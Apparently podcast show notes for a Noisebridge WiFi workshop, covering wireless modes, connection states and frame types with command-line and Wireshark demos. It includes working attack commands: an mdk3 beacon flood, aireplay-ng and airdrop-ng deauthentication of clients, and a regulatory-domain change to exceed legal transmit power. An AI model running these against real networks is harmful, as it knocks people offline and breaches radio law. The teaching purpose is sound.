Wifi Hacking Workshop: Part 2

This time on the show, part 2 of our WiFi from-the-ground-up series. Darren presents a wireless workshop at the Noisebridge hackerspace in San Francisco.

This time on the show, part 2 of our WiFi from-the-ground-up series. Darren presents a wireless workshop at the Noisebridge hackerspace in San Francisco.

6 Modes of WiFi
Master - Access Point or Base Station
Managed - Infrastructure Mode (Client)

Demo: Managed
iwconfig wlan0 mode manged
iwconfig wlan0 essid pineapple
iwconfig wlan0
*more on associations soon

Ad-Hoc - peer to peer

Demo: Ad-Hoc
iwconfig wlan0 channel 1 essid myadhocnetwork mode ad-hoc

Mesh - Mesh Cloud/Network. Planned Ad-hoc
Repeater - Range Extender
Monitor (RFMON)

Demo: Monitor Mode
airmon-ng start wlan2
tshark -i mon0

Modes and your NIC
Not all wireless NICs are made the same.
Depending on chipset and other factors your adapter may not support all 6 modes.

Demo: Determinte your NICs available modes
airmon-ng # find phy#
iw phy phy1 info | grep -A8 modes

A Word On Transmit Power
Like channels, transmit power, or txpower, is regulated by country.
In the US, txpower has a max of 500 Milli Watts, or 20 dBm This is hard coded into the Linux Kernel (though can be changed)
Easier than changing the kernel is to move to a country with nicer laws

Demo: Moving to Bolivia
iw reg get
iw reg set BO
iwconfig wlan2 txpower 30

3 States of Wifi

State 1: Unauthenticated and Unassociated
State 2: Authenticated but Unassociated
State 3: Authenticated and Associated

WiFi Frames

Frames: Simply Data Packets
Typically made up of: Header, Payload, Integrity Check (CRC)
Frame Header:
Source and Destination
Ether Type (What Protocol)
Frame Check Sequence:
Say that again?

WiFi Frames:
Management Frames
Control Frames
Data Frames

Management Frames:

Advertise the network
Specify SSID (network name), Channels and other capabilities

Demo: Beacon Flood Attack

airmon-ng start wlan2
mdk3 mon0 b -f ssidlist.txt

Demo: Analyze Beacon Frame
gksudo wireshark & disown
wlan.fc.subtype == 0x08
# IEEE 802.11 Beacon Frame > Frame Control > Type Management > Subtype 8
# IEEE 802.11 Management Frame > Tagged parameters

Probe Frame:
Probe Request - Are you my friend?
Probe Response
- Includes capability info

Demo: Is that a probe in your pocket or are you just happy to see me?

# Look what's coming out of everyone's devices!
airmon-ng start wlan2
airodump-ng mon0

- Open, WEP (Shared), WPA, WPA2, WPA-Radius

Association Request - Can we be friends?
Association Response

Demo: Analyze Connection to Open AP

# start wirehark on wlan2
# Silence the noise!
wlan.addr == 00:c0:ca:54:51:ef and not wlan.fc.subtype == 0x08

# Passive Scan should not generate any frames
iw dev wlan2 scan passive | grep SSID

# Active Scan
iw wlan2 scan | grep SSID
Display only REQUESTS by updating wireshark filter to include "and wlan.fc.subtype == 0x04"
Display only RESPONSES by changing 0x04 to 0x05

airmon-ng start wlan2
airodump-ng mon0
# find channel for AP "pineapple"
iwconfig wlan2 channel 11
iwconfig mon0 channel 11
iwconfig wlan2 | grep Frequency
gksudo wireshark & disown

# Filter for just pineapple and not beacons
wlan.addr == 00:C0:CA:60:53:2E and not wlan.fc.subtype == 0x08
# Associate
# Filter for just phone and pineapple wlan.addr == 00:C0:CA:60:53:2E and wlan.addr == a0:0b:ba:ba:6a:ca
# Probe Request SSID=Broadcast = null probe request

Remember trust?

Demo: Deauthenticate my phone!
iwconfig mon0 channel 11
aireplay-ng -0 10 -a 00:C0:CA:60:53:2E -c A0:0B:BA:BA:6A:CA mon0

Demo: Hella Deauthentication with Airdrop-ng
# Begin demo connected to anything but pineapple airodump-ng --output-format csv --write /root/dump.csv mon0
airdrop-ng -i mon0 -t /root/dump.csv-01.csv -r /root/droprules

Control Frames:
Request to Send - RTS: Can I speak?
Clear to Send - CTS: Sure! Everyone else shut up.
Acknowledgement - ACK: Cool, I got what you said ok.

Data Frames: